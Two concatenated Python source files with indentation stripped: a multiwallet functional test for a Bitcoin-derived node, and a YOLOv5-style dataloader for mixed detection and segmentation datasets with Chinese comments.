# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another ludiriumd?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another ludiriumd?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
mixed_datasets.py
|
import glob
import hashlib
import logging
import math
import os
import random
import shutil
from itertools import repeat
from multiprocessing.dummy import Pool as ThreadPool
from pathlib import Path
from typing import List, Tuple
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.data as torch_data
from PIL import ExifTags, Image
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import check_requirements, clean_str, init_seeds, resample_segments,\
segment2box, segments2boxes, xyn2xy, xywh2xyxy,\
xywhn2xyxy, xyxy2xywh, seg_xyn2xy, generate_seg_labels_img
from .torch_utils import torch_distributed_zero_first
# Parameters
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # 可用的图片后缀名
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # 可用的视频后缀名
NUM_THREADS = min(8, os.cpu_count() or 1) # number of multiprocessing threads
# 获取exif中Orientation标签key值
orientation = next(filter(lambda item: item[1] == 'Orientation', ExifTags.TAGS.items()))[0]
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = 0
for p in paths:
p = Path(p)
if p.is_file():
size += p.stat().st_size
elif p.is_dir():
size += sum([t.stat().st_size for t in p.glob('*.*')])
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# 返回exif修正后的PIL图片宽高 (weight, height)
s = img.size # (width, height)
try:
rotation = img.getexif()[orientation]
if rotation in [Image.ROTATE_90, Image.ROTATE_270]:
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
rotation = exif.get(orientation, 1) # default 1
if rotation > 1:
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90
}.get(rotation)
if method is not None:
image = image.transpose(method)
del exif[orientation]
image.info["exif"] = exif.tobytes()
return image
def create_mixed_dataloader(path, imgsz, batch_size, stride, single_cls, hyp=None, augment=False, pad=0.0, rect=False,
rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
# 确保 DDP 中的主进程先加载 dataset,这样其他进程可以使用其缓存
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([NUM_THREADS, batch_size if batch_size > 1 else 0, workers]) # workers 数量
sampler = torch_data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch_data.DataLoader if image_weights else InfiniteDataLoader
# loader = torch_data.DataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
drop_last=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch_data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for _ in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
print('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
de_labels: List[str] = [] # 目标检测的 label_paths
se_labels: List[str] = [] # 语义分割的 label_paths
for x in img_paths:
x = Path(x)
f_name = x.with_suffix('.txt').name
de_parent = x.parent.parent.with_name('DeLabels') / x.parent.name
de_labels.append(str(de_parent / f_name))
se_parent = x.parent.parent.with_name('SeLabels') / x.parent.name
se_labels.append(str(se_parent / f_name))
return de_labels, se_labels
class LoadImagesAndLabels(Dataset): # for training/testing
cache_version = 0.5 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.batch_size = batch_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # 同时加载四张图片为一张 mosaic 图(仅在训练期间有效)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.pad = pad
self.path = path
p = None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p)
if p.is_dir(): # dir
f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with p.open('r') as t:
t = t.read().strip().splitlines()
f += [p.parent / x.lstrip(os.sep) for x in t] # lacal to global path
else:
raise Exception(f'{prefix}{p} 不存在')
self.img_files = sorted([str(x) for x in f if x.suffix[1:].lower() in IMG_FORMATS])
assert self.img_files, f'{prefix}没找到图片'
except Exception as e:
raise Exception(f'{prefix}数据加载错误,{path}: {e}')
# 检查缓存
assert isinstance(p, Path)
self.de_label_files, self.se_label_files = img2label_paths(self.img_files)
cache_parent = p.parent.parent if p.is_file() else Path(self.de_label_files[0]).parent.parent.parent
cache_name = (p if p.is_file() else Path(self.de_label_files[0]).parent).with_suffix('.cache').name
cache_path = cache_parent / cache_name
if cache_path.is_file():
cache, exists = torch.load(cache_path), True
if cache['hash'] != get_hash(self.de_label_files + self.se_label_files + self.img_files): # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# 显示缓存文件
nf, nm, ne, nc, nu = cache.pop('results') # found, missing, empty, corrupted, used
if exists:
d = f"已扫描 '{cache_path}' 中的图片和标注... 发现{nf}个,丢失{nm}个,空{ne}个,损坏{nc}个,使用{nu}个"
tqdm(None, desc=prefix + d, total=nu, initial=nu) # 显示 cache 结果
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # 显示 warnings
assert nu > 0 or not augment, f'{prefix}{cache_path}中无标注,无法训练'
bi = np.floor(np.arange(nu) / batch_size).astype(np.int32) # batch index
self.batch = bi # batch index of image
self.n = nu
self.indices = list(range(nu))
# 读取缓存文件
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # 移除元素
self._cache_items = list(cache.items())
# TODO 下面这行可能不需要在 init 时运行,但也不一定哈哈哈
self.img_files, self.shapes, self.det_labels, self.seg_labels = self.shuffle()
self.de_label_files, self.se_label_files = img2label_paths(cache.keys()) # update
if single_cls:
for d, s in zip(self.det_labels, self.seg_labels):
d[:, 0] = 0
s[:, 0] = 0
# TODO 将图片缓存到内存以加速训练(注意:大数据集可能超过RAM)
def shuffle(self):
random.shuffle(self._cache_items) # TODO 此处很重要
self.img_files = [item[0] for item in self._cache_items] # update
cache_values = [item[1] for item in self._cache_items]
self.shapes, self.det_labels, self.seg_labels = zip(*cache_values) # update
self.shapes = np.array(self.shapes, dtype=np.float32)
# 矩形训练
if self.rect:
# 按长宽比排序
ar = self.shapes[:, 1] / self.shapes[:, 0] # aspect ratio (长宽比)
irect = ar.argsort()
ar = ar[irect]
# 图片、标注 按图片长宽比从小到大排序
self.img_files = [self.img_files[i] for i in irect] # 图片路径
self.det_labels = [self.det_labels[i] for i in irect] # 目标检测标注内容
self.seg_labels = [self.seg_labels[i] for i in irect] # 语义分割标注内容
self.shapes = self.shapes[irect] # 图片尺寸
# 设置用来训练的图片的尺寸
bi = self.batch # batch index of image
nb = self.batch[-1] + 1 # number of batches
shapes = []
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes.append([maxi, 1])
elif mini > 1:
shapes.append([1, 1 / mini])
else:
shapes.append([1, 1])
self.batch_shapes = np.ceil(np.array(shapes) * self.img_size / self.stride + self.pad).astype(np.int32) * self.stride
return self.img_files, self.shapes, self.det_labels, self.seg_labels
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# 缓存数据集标注,检查图片并读取形状
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupted, messages
desc = f"{prefix}正在扫描 '{path.parent}({path.stem})' 中的图片和标注... "
with ThreadPool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.de_label_files, self.se_label_files, repeat(prefix))), desc=desc, total=len(self.img_files))
for im_file, det_labels_f, seg_labels_f, shape, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if len(det_labels_f) or len(seg_labels_f):
x[im_file] = [shape, det_labels_f, seg_labels_f]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}发现{nf}个, 丢失{nm}个, 空{ne}个, 损坏{nc}个"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}警告:{path}中没找到标注.')
nu = len(x) # number used
x['hash'] = get_hash(self.de_label_files + self.se_label_files + self.img_files)
x['results'] = nf, nm, ne, nc, nu
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
torch.save(x, path) # save cache for next time
logging.info(f'{prefix}新的cache已创建:{path}')
except Exception as e:
logging.info(f'{prefix}警告:cache所在目录 {path.parent} 不可写:{e}') # path 不可写
return x
def __len__(self):
return self.n
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
# assert hyp is not None
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# load mosaic
img, det_labels, seg_labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
# if random.random() < hyp['mixup']:
# img2, det_labels2, seg_labels2 = load_mosaic(self, random.randint(0, self.n - 1))
# r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
# img = (img * r + img2 * (1 - r)).astype(np.uint8)
# det_labels = np.concatenate((det_labels, det_labels2), 0)
# seg_labels = np.concatenate((seg_labels, seg_labels2), 0)
else:
# load image
img, (h0, w0), (h, w) = load_image(self, index)
# letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # 最终的 letterboxed 尺寸
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
det_labels = self.det_labels[index].copy()
seg_labels = self.seg_labels[index].copy()
assert isinstance(det_labels, np.ndarray), 'det_labels 应为 numpy 数组'
assert isinstance(seg_labels, np.ndarray), 'seg_labels 应为 numpy 数组'
if det_labels.size: # normalized xywh to pixwl xyxy format
det_labels[:, 1:] = xywhn2xyxy(det_labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if seg_labels.size:
seg_labels[:, 1] = seg_xyn2xy(seg_labels[:, 1], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, det_labels, seg_labels = random_perspective(img, det_labels, seg_labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
det_labels_num = len(det_labels) # number of det_labels
if det_labels_num:
det_labels[:, 1:5] = xyxy2xywh(det_labels[:, 1:5]) # convert xyxy to xywh
det_labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
det_labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
seg_labels_num = len(seg_labels) # number of seg_labels
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if seg_labels_num:
for item in seg_labels[:, 1]:
item[:, 1] = img.shape[0] - item[:, 1]
if det_labels_num:
det_labels[:, 2] = 1 - det_labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if seg_labels_num:
for item in seg_labels[:, 1]:
item[:, 0] = img.shape[1] - item[:, 0]
if det_labels_num:
det_labels[:, 1] = 1 - det_labels[:, 1]
zeros = torch.zeros(len(det_labels), 1)
det_labels = torch.cat([zeros, torch.from_numpy(det_labels)], dim=1)
# 生成语义分割图片
